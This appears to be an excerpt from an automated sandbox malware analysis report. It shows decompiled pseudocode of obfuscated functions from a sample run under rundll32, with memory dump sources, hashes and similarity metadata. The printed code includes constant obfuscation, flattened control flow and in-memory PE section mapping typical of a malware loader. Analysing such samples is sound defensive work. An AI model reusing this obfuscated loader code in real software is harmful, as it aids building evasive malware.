                                                                                                                      0x002ca3a5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ca3ba
                                                                                                                      0x002ca3ba
                                                                                                                      0x002ca3bb
                                                                                                                      0x002ca3bb
                                                                                                                      0x00000000
                                                                                                                      0x002ca3c2
                                                                                                                      0x002ca3c2
                                                                                                                      0x002ca3c2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *NXu$H"$kZ\$mv(
                                                                                                                      • API String ID: 0-3447753402
                                                                                                                      • Opcode ID: 8ffe67a786d0ce49982577d23fd060794f690740851f2a4821bc0c8eb4a7d2ca
                                                                                                                      • Instruction ID: add3fdfeb4411c26f72cd55ef9a1a54dfebb44f4a2fb4764d9ecff4f79f7b59e
                                                                                                                      • Opcode Fuzzy Hash: 8ffe67a786d0ce49982577d23fd060794f690740851f2a4821bc0c8eb4a7d2ca
                                                                                                                      • Instruction Fuzzy Hash: 567182714183819BC368DF24C88AA1FBBF2BBC5358F505A4DF48696260C3B5CA59CB83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BF58F Relevance: 5.2, Strings: 4, Instructions: 166COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002BF58F(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v560;
				char _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t129;
				signed int _t143;
				signed int _t144;
				void* _t151;
				signed int _t155;
				char _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int* _t181;

				_push(_a12);
				_t173 = _a4;
				_push(_a8);
				_push(_t173);
				_push(E002D0CF5);
				_push(__ecx);
				E002BCF25(_t129);
				_v660 = 0x8d8445;
				_t181 =  &(( &_v680)[5]);
				_t151 = 0x740f7fb;
				_t174 = 0x71;
				_v660 = _v660 / _t174;
				_v660 = _v660 ^ 0x128b90b3;
				_v660 = _v660 ^ 0x128ad02b;
				_v640 = 0x9067b5;
				_v640 = _v640 + 0x286c;
				_v640 = _v640 ^ 0x00975038;
				_v632 = 0x5011ea;
				_v632 = _v632 + 0xffff22a1;
				_v632 = _v632 ^ 0x00475e04;
				_v628 = 0xc0b5ed;
				_v628 = _v628 | 0x09c79ac0;
				_v628 = _v628 ^ 0x09cd8243;
				_v652 = 0x6be172;
				_v652 = _v652 << 0xe;
				_v652 = _v652 ^ 0xf9ae6093;
				_v652 = _v652 ^ 0x01f8093d;
				_v644 = 0xbd5efb;
				_v644 = _v644 << 3;
				_v644 = _v644 ^ 0x05e3f72f;
				_v656 = 0xc95ad0;
				_t175 = 0x15;
				_v656 = _v656 / _t175;
				_v656 = _v656 | 0xa2f71cc0;
				_v656 = _v656 ^ 0xa2f780bc;
				_v676 = 0xbb6512;
				_v676 = _v676 << 0x10;
				_v676 = _v676 ^ 0x67ff039f;
				_v676 = _v676 + 0xffff3430;
				_v676 = _v676 ^ 0x02e7c46b;
				_v636 = 0x771a54;
				_v636 = _v636 >> 0xf;
				_v636 = _v636 ^ 0x000f324c;
				_v680 = 0x44376b;
				_v680 = _v680 + 0xffff61f8;
				_v680 = _v680 + 0xffff924c;
				_v680 = _v680 << 0xc;
				_v680 = _v680 ^ 0x32b3ed2b;
				_v672 = 0x492cee;
				_v672 = _v672 | 0xff7fdef6;
				_v672 = _v672 ^ 0xff79836a;
				_v664 = 0x821e3f;
				_v664 = _v664 + 0xffff0102;
				_v664 = _v664 << 0xd;
				_v664 = _v664 ^ 0x23edf1fd;
				_v648 = 0xfa5772;
				_v648 = _v648 + 0x1fee;
				_v648 = _v648 ^ 0x00f8d439;
				_v668 = 0x765780;
				_t176 = 0x5a;
				_v668 = _v668 / _t176;
				_t177 = 0x7e;
				_t178 = _v648;
				_v668 = _v668 / _t177;
				_v668 = _v668 ^ 0x0009a212;
				L1:
				while(_t151 != 0x4c653bf) {
					if(_t151 == 0x50dca7b) {
						_v560 = 0x22c;
						_t144 = E002D0296( &_v560, _v644, _t178, _v656, _v676);
						_t181 =  &(_t181[3]);
						L10:
						asm("sbb ecx, ecx");
						_t155 =  ~_t144 & 0x074f90c1;
						L8:
						_t151 = _t155 + 0x59cade0;
						continue;
					}
					if(_t151 == 0x59cade0) {
						return E002C4DAD(_v672, _v664, _t178, _v648, _v668);
					}
					if(_t151 == 0x740f7fb) {
						_v624 = _t173;
						_t151 = 0x4c653bf;
						continue;
					}
					if(_t151 == 0xc1665e4) {
						_t144 = E002CE3F7(_v636, _t178,  &_v560, _v680);
						goto L10;
					}
					_t190 = _t151 - 0xcec3ea1;
					if(_t151 != 0xcec3ea1) {
						L16:
						__eflags = _t151 - 0x2876c78;
						if(__eflags != 0) {
							continue;
						}
						return _t144;
					}
					_t144 = E002D0CF5(_t151, _t190,  &_v560,  &_v624);
					asm("sbb ecx, ecx");
					_t155 =  ~_t144 & 0x0679b804;
					goto L8;
				}
				_t143 = E002B3C3B(_t151, _v660);
				_t178 = _t143;
				_t181 = _t181 - 0xc + 0x10;
				__eflags = _t143 - 0xffffffff;
				if(__eflags == 0) {
					_t151 = 0x2876c78;
					goto L16;
				}
				_t151 = 0x50dca7b;
				goto L1;
			}






























                                                                                                                      0x002bf599
                                                                                                                      0x002bf5a0
                                                                                                                      0x002bf5a7
                                                                                                                      0x002bf5ae
                                                                                                                      0x002bf5af
                                                                                                                      0x002bf5b4
                                                                                                                      0x002bf5b5
                                                                                                                      0x002bf5ba
                                                                                                                      0x002bf5c2
                                                                                                                      0x002bf5cb
                                                                                                                      0x002bf5d2
                                                                                                                      0x002bf5d7
                                                                                                                      0x002bf5dd
                                                                                                                      0x002bf5e5
                                                                                                                      0x002bf5ed
                                                                                                                      0x002bf5f5
                                                                                                                      0x002bf5fd
                                                                                                                      0x002bf605
                                                                                                                      0x002bf60d
                                                                                                                      0x002bf615
                                                                                                                      0x002bf61d
                                                                                                                      0x002bf625
                                                                                                                      0x002bf62d
                                                                                                                      0x002bf635
                                                                                                                      0x002bf63d
                                                                                                                      0x002bf642
                                                                                                                      0x002bf64a
                                                                                                                      0x002bf652
                                                                                                                      0x002bf65a
                                                                                                                      0x002bf65f
                                                                                                                      0x002bf667
                                                                                                                      0x002bf673
                                                                                                                      0x002bf678
                                                                                                                      0x002bf67e
                                                                                                                      0x002bf686
                                                                                                                      0x002bf68e
                                                                                                                      0x002bf696
                                                                                                                      0x002bf69b
                                                                                                                      0x002bf6a3
                                                                                                                      0x002bf6ab
                                                                                                                      0x002bf6b3
                                                                                                                      0x002bf6bb
                                                                                                                      0x002bf6c0
                                                                                                                      0x002bf6c8
                                                                                                                      0x002bf6d0
                                                                                                                      0x002bf6d8
                                                                                                                      0x002bf6e0
                                                                                                                      0x002bf6e5
                                                                                                                      0x002bf6ed
                                                                                                                      0x002bf6f5
                                                                                                                      0x002bf6fd
                                                                                                                      0x002bf705
                                                                                                                      0x002bf70d
                                                                                                                      0x002bf715
                                                                                                                      0x002bf71a
                                                                                                                      0x002bf722
                                                                                                                      0x002bf72a
                                                                                                                      0x002bf732
                                                                                                                      0x002bf73a
                                                                                                                      0x002bf746
                                                                                                                      0x002bf74b
                                                                                                                      0x002bf755
                                                                                                                      0x002bf758
                                                                                                                      0x002bf761
                                                                                                                      0x002bf76a
                                                                                                                      0x00000000
                                                                                                                      0x002bf772
                                                                                                                      0x002bf780
                                                                                                                      0x002bf805
                                                                                                                      0x002bf819
                                                                                                                      0x002bf81e
                                                                                                                      0x002bf7e1
                                                                                                                      0x002bf7e5
                                                                                                                      0x002bf7e7
                                                                                                                      0x002bf7c4
                                                                                                                      0x002bf7c4
                                                                                                                      0x00000000
                                                                                                                      0x002bf7c4
                                                                                                                      0x002bf784
                                                                                                                      0x00000000
                                                                                                                      0x002bf87c
                                                                                                                      0x002bf790
                                                                                                                      0x002bf7ef
                                                                                                                      0x002bf7f3
                                                                                                                      0x00000000
                                                                                                                      0x002bf7f3
                                                                                                                      0x002bf798
                                                                                                                      0x002bf7da
                                                                                                                      0x00000000
                                                                                                                      0x002bf7e0
                                                                                                                      0x002bf79a
                                                                                                                      0x002bf7a0
                                                                                                                      0x002bf858
                                                                                                                      0x002bf858
                                                                                                                      0x002bf85e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bf85e
                                                                                                                      0x002bf7b3
                                                                                                                      0x002bf7bc
                                                                                                                      0x002bf7be
                                                                                                                      0x00000000
                                                                                                                      0x002bf7be
                                                                                                                      0x002bf83a
                                                                                                                      0x002bf83f
                                                                                                                      0x002bf841
                                                                                                                      0x002bf844
                                                                                                                      0x002bf847
                                                                                                                      0x002bf853
                                                                                                                      0x00000000
                                                                                                                      0x002bf853
                                                                                                                      0x002bf849
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k7D$l($rk$,I
                                                                                                                      • API String ID: 0-1943337972
                                                                                                                      • Opcode ID: 5cd830d83508ed75ab2f871d234de20d52a494a5dd80b1a4b030c1ecf807255b
                                                                                                                      • Instruction ID: b448b6258f3e1ba366df72debed64fc0ae4c275e7123eaab77d5f4cb5f5b9945
                                                                                                                      • Opcode Fuzzy Hash: 5cd830d83508ed75ab2f871d234de20d52a494a5dd80b1a4b030c1ecf807255b
                                                                                                                      • Instruction Fuzzy Hash: FD71AC715193019BC7A4CF28C98989FBBF1FBC4758F504A6EF29696260D7B08919CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C8D71 Relevance: 5.1, Strings: 4, Instructions: 135COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E002C8D71(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t119;
				void* _t128;
				void* _t138;
				void* _t140;
				signed int _t142;
				signed int _t143;
				void* _t158;
				void* _t163;
				signed int* _t167;
				signed int* _t168;
				signed int* _t169;

				_t165 = _a12;
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t119);
				_v4 = _v4 & 0x00000000;
				_v12 = 0xd63ca;
				_v8 = 0x2a80fb;
				_v32 = 0xd656a7;
				_t142 = 0x2a;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x62cbe0fa;
				_v60 = 0xd42ea;
				_v60 = _v60 | 0xae184de3;
				_v60 = _v60 * 0x64;
				_v60 = _v60 ^ 0xa1370c8b;
				_v60 = _v60 ^ 0xa2441b47;
				_v28 = 0x613a22;
				_v28 = _v28 + 0xe1cd;
				_v28 = _v28 ^ 0x00621baf;
				_v48 = 0x1555f7;
				_v48 = _v48 | 0xf97f7abf;
				_v48 = _v48 ^ 0xf978b226;
				_v36 = 0xa4495c;
				_v36 = _v36 << 0xc;
				_v36 = _v36 ^ 0x449a63ff;
				_v64 = 0xc77e0d;
				_v64 = _v64 * 0x7d;
				_v64 = _v64 << 3;
				_v64 = _v64 / _t142;
				_v64 = _v64 ^ 0x0042e8ad;
				_v24 = 0xcd3d37;
				_v24 = _v24 ^ 0xb946add1;
				_v24 = _v24 ^ 0xb982581d;
				_v40 = 0xe4266b;
				_v40 = _v40 << 9;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x064c7215;
				_v44 = 0x9ee2d0;
				_v44 = _v44 + 0xdca1;
				_v44 = _v44 ^ 0x9755f080;
				_v44 = _v44 ^ 0x97c96657;
				_v20 = 0xa48706;
				_v20 = _v20 | 0xe10b6776;
				_v20 = _v20 ^ 0xe1a97c21;
				_v56 = 0x583a03;
				_v56 = _v56 * 0x56;
				_v56 = _v56 + 0x9dad;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0xd77aa722;
				_v52 = 0xf9a5b4;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffff4c61;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x033f85cc;
				_v16 = 0x1cccaa;
				_v16 = _v16 + 0x745b;
				_v16 = _v16 ^ 0x0015a734;
				_t143 = _v48;
				_t128 = E002CBE0B(_t143, _v36, _v64, _a12);
				_t138 = _t128;
				_t167 =  &(( &_v64)[8]);
				if(_t138 != 0) {
					_push(_t143);
					_t158 = E002BB0DA(_v24, _v40,  *((intOrPtr*)(_t138 + 0x50)), _v28, _v44, _v60 | _v32);
					_t168 =  &(_t167[5]);
					if(_t158 == 0) {
						L6:
						return _t158;
					}
					E002CFD29( *_t165, _v20, _t158, _v56,  *((intOrPtr*)(_t138 + 0x54)));
					_t169 =  &(_t168[3]);
					_t163 = ( *(_t138 + 0x14) & 0x0000ffff) + 0x18 + _t138;
					_t140 = ( *(_t138 + 6) & 0x0000ffff) * 0x28 + _t163;
					while(_t163 < _t140) {
						_t136 =  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10));
						E002CFD29( *((intOrPtr*)(_t163 + 0x14)) +  *_t165, _v52,  *((intOrPtr*)(_t163 + 0xc)) + _t158, _v16,  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10)));
						_t169 =  &(_t169[3]);
						_t163 = _t163 + 0x28;
					}
					goto L6;
				}
				return _t128;
			}






























                                                                                                                      0x002c8d76
                                                                                                                      0x002c8d7a
                                                                                                                      0x002c8d7c
                                                                                                                      0x002c8d7d
                                                                                                                      0x002c8d81
                                                                                                                      0x002c8d85
                                                                                                                      0x002c8d86
                                                                                                                      0x002c8d87
                                                                                                                      0x002c8d8c
                                                                                                                      0x002c8d93
                                                                                                                      0x002c8d9b
                                                                                                                      0x002c8da3
                                                                                                                      0x002c8db2
                                                                                                                      0x002c8db4
                                                                                                                      0x002c8db8
                                                                                                                      0x002c8dc0
                                                                                                                      0x002c8dc8
                                                                                                                      0x002c8dd5
                                                                                                                      0x002c8dd9
                                                                                                                      0x002c8de1
                                                                                                                      0x002c8de9
                                                                                                                      0x002c8df1
                                                                                                                      0x002c8df9
                                                                                                                      0x002c8e01
                                                                                                                      0x002c8e09
                                                                                                                      0x002c8e11
                                                                                                                      0x002c8e19
                                                                                                                      0x002c8e21
                                                                                                                      0x002c8e26
                                                                                                                      0x002c8e2e
                                                                                                                      0x002c8e3b
                                                                                                                      0x002c8e3f
                                                                                                                      0x002c8e4a
                                                                                                                      0x002c8e4e
                                                                                                                      0x002c8e56
                                                                                                                      0x002c8e5e
                                                                                                                      0x002c8e66
                                                                                                                      0x002c8e6e
                                                                                                                      0x002c8e76
                                                                                                                      0x002c8e7b
                                                                                                                      0x002c8e80
                                                                                                                      0x002c8e88
                                                                                                                      0x002c8e90
                                                                                                                      0x002c8e98
                                                                                                                      0x002c8ea0
                                                                                                                      0x002c8ea8
                                                                                                                      0x002c8eb0
                                                                                                                      0x002c8eb8
                                                                                                                      0x002c8ec0
                                                                                                                      0x002c8ecd
                                                                                                                      0x002c8ed1
                                                                                                                      0x002c8ede
                                                                                                                      0x002c8ee2
                                                                                                                      0x002c8eea
                                                                                                                      0x002c8ef2
                                                                                                                      0x002c8ef7
                                                                                                                      0x002c8eff
                                                                                                                      0x002c8f04
                                                                                                                      0x002c8f0c
                                                                                                                      0x002c8f14
                                                                                                                      0x002c8f1c
                                                                                                                      0x002c8f2c
                                                                                                                      0x002c8f30
                                                                                                                      0x002c8f35
                                                                                                                      0x002c8f37
                                                                                                                      0x002c8f3c
                                                                                                                      0x002c8f4b
                                                                                                                      0x002c8f65
                                                                                                                      0x002c8f67
                                                                                                                      0x002c8f6c
                                                                                                                      0x002c8fc9
                                                                                                                      0x00000000
                                                                                                                      0x002c8fcb
                                                                                                                      0x002c8f7e
                                                                                                                      0x002c8f87
                                                                                                                      0x002c8f91
                                                                                                                      0x002c8f96
                                                                                                                      0x002c8fc4
                                                                                                                      0x002c8fab
                                                                                                                      0x002c8fb9
                                                                                                                      0x002c8fbe
                                                                                                                      0x002c8fc1
                                                                                                                      0x002c8fc1
                                                                                                                      0x00000000
                                                                                                                      0x002c8fc8
                                                                                                                      0x002c8fd1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ":a$[t$k&$B
                                                                                                                      • API String ID: 0-806590991
                                                                                                                      • Opcode ID: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction ID: 4dd073c7582b030aec01353ac7febbd07e26739b0a73d90e4870fb29e0e885e9
                                                                                                                      • Opcode Fuzzy Hash: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction Fuzzy Hash: 035120B15183809FC354CF65C98691BFBF1BBC8748F409A1DF99A9A220D3B5DA48CF06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction ID: 7f1c2cc19d32dc966023cfaeb6742e61450fd940bcfd9952f16cd7e7d576cf6d
                                                                                                                      • Opcode Fuzzy Hash: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction Fuzzy Hash: 4AF0C871E04238ABE715DBA489556EFB7E4EB09A81B11416CD981E7251EE206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C45CD Relevance: 4.0, Strings: 3, Instructions: 258COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002C45CD(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				unsigned int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* __ecx;
				void* _t260;
				intOrPtr _t280;
				intOrPtr _t283;
				void* _t285;
				intOrPtr _t286;
				void* _t288;
				intOrPtr* _t291;
				void* _t293;
				intOrPtr _t310;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t317;
				void* _t318;

				_t291 = _a8;
				_t312 = _a4;
				_push(_t291);
				_push(_a4);
				_push(__edx);
				E002BCF25(_t260);
				_v16 = 0xeda856;
				_t310 = 0;
				_v12 = 0;
				_t318 = _t317 + 0x10;
				_v8 = 0;
				_v108 = 0x9530b9;
				_t293 = 0x1386c75;
				_v108 = _v108 + 0xffff8498;
				_v108 = _v108 + 0xffff62a2;
				_v108 = _v108 ^ 0x009417f2;
				_v72 = 0x4d29da;
				_v72 = _v72 | 0x3a723bc7;
				_v72 = _v72 ^ 0x3a7f3bde;
				_v68 = 0xbb7b0e;
				_v68 = _v68 | 0x90968cd5;
				_v68 = _v68 ^ 0x90bfffdf;
				_v32 = 0x962435;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2c486a00;
				_v124 = 0x38cf9b;
				_t313 = 0x3a;
				_v124 = _v124 * 0x5b;
				_v124 = _v124 / _t313;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x02c91350;
				_v104 = 0xa200dd;
				_v104 = _v104 ^ 0x0aab722c;
				_v104 = _v104 + 0xffff0d17;
				_v104 = _v104 ^ 0x0a088008;
				_v136 = 0xa03782;
				_v136 = _v136 >> 4;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 + 0xffffdc54;
				_v136 = _v136 ^ 0xffffdc68;
				_v100 = 0xea2f66;
				_v100 = _v100 + 0xffffd1b3;
				_v100 = _v100 + 0xffff51f8;
				_v100 = _v100 ^ 0x00e840e3;
				_v132 = 0xadb516;
				_v132 = _v132 + 0xffff9028;
				_v132 = _v132 * 0x44;
				_v132 = _v132 + 0xffffe891;
				_v132 = _v132 ^ 0x2e08c107;
				_v140 = 0xeec816;
				_v140 = _v140 >> 7;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 << 5;
				_v140 = _v140 ^ 0x000acf9f;
				_v116 = 0xb8b4c3;
				_v116 = _v116 + 0x5cf4;
				_v116 = _v116 + 0xffff9c7f;
				_v116 = _v116 ^ 0x00b90cd0;
				_v144 = 0x42ac99;
				_v144 = _v144 + 0xfffff6b6;
				_v144 = _v144 | 0xd26fea09;
				_v144 = _v144 + 0xcbeb;
				_v144 = _v144 ^ 0xd277b085;
				_v96 = 0x1bc5eb;
				_v96 = _v96 * 0x6c;
				_v96 = _v96 + 0x8f6c;
				_v96 = _v96 ^ 0x0bb05dde;
				_v48 = 0x1a2576;
				_v48 = _v48 * 0x64;
				_v48 = _v48 ^ 0x0a36ba39;
				_v88 = 0xc7f5d;
				_v88 = _v88 >> 4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x00037446;
				_v84 = 0x3f34b5;
				_t314 = 0x5e;
				_v84 = _v84 * 0x31;
				_v84 = _v84 >> 0xe;
				_v84 = _v84 ^ 0x000d159a;
				_v120 = 0x5d4df8;
				_v120 = _v120 + 0xffffa239;
				_v120 = _v120 << 4;
				_v120 = _v120 ^ 0x05c58312;
				_v60 = 0x26932d;
				_v60 = _v60 / _t314;
				_v60 = _v60 ^ 0x000131ea;
				_v28 = 0x785747;
				_v28 = _v28 ^ 0x77c5d7dc;
				_v28 = _v28 ^ 0x77b818bc;
				_v56 = 0xd134ba;
				_t315 = 0x67;
				_v56 = _v56 * 7;
				_v56 = _v56 ^ 0x05bb4239;
				_v40 = 0xd9afd1;
				_v40 = _v40 * 0x25;
				_v40 = _v40 ^ 0x1f79b6d7;
				_v128 = 0x3f4f78;
				_v128 = _v128 / _t315;
				_v128 = _v128 | 0x7b2b5a07;
				_v128 = _v128 + 0xfffffa98;
				_v128 = _v128 ^ 0x7b2edba2;
				_v80 = 0xe956c4;
				_v80 = _v80 << 5;
				_v80 = _v80 ^ 0x1d2c49e8;
				_v64 = 0x3f3e0b;
				_v64 = _v64 * 5;
				_v64 = _v64 ^ 0x01394f8d;
				_v112 = 0xfc7f0a;
				_v112 = _v112 + 0xffff18e0;
				_v112 = _v112 + 0xffffa855;
				_v112 = _v112 ^ 0x00f14c19;
				_v92 = 0x78d624;
				_v92 = _v92 << 6;
				_v92 = _v92 + 0xffffec5c;
				_v92 = _v92 ^ 0x1e335a68;
				_v36 = 0xd9641a;
				_v36 = _v36 + 0xffff84de;
				_v36 = _v36 ^ 0x00d9de20;
				_v44 = 0x6f829b;
				_v44 = _v44 ^ 0xdbcb61d0;
				_v44 = _v44 ^ 0xdba9195b;
				_v52 = 0xea26f7;
				_v52 = _v52 + 0xffff0808;
				_v52 = _v52 ^ 0x00eef997;
				_v76 = 0xef1604;
				_v76 = _v76 + 0xfcdc;
				_v76 = _v76 + 0xffff9946;
				_v76 = _v76 ^ 0x00e2e7da;
				while(_t293 != 0x1386c75) {
					if(_t293 == 0x185c552) {
						_push(_t293);
						_push(_t293);
						_t280 = E002C3512(_v20);
						_v24 = _t280;
						if(_t280 != 0) {
							_t293 = 0x84b6bf9;
							continue;
						}
					} else {
						if(_t293 == 0x1b7bba2) {
							E002B68DE(_v36, _v44, _v52, _v76, _v24);
						} else {
							if(_t293 == 0x8150c28) {
								_t283 =  *0x2d5c9c; // 0x0
								_t285 = E002BAD30( *_t312, 0, _v100, _v132, _v140,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v68, _v108, _v32, _v116, _v144,  *((intOrPtr*)(_t283 + 0x50)), _t293, _t293, _v96, _v48, _v88);
								_t318 = _t318 + 0x40;
								if(_t285 == _v124) {
									_t293 = 0x185c552;
									continue;
								}
							} else {
								if(_t293 != 0x84b6bf9) {
									L13:
									if(_t293 != 0x3792bf2) {
										continue;
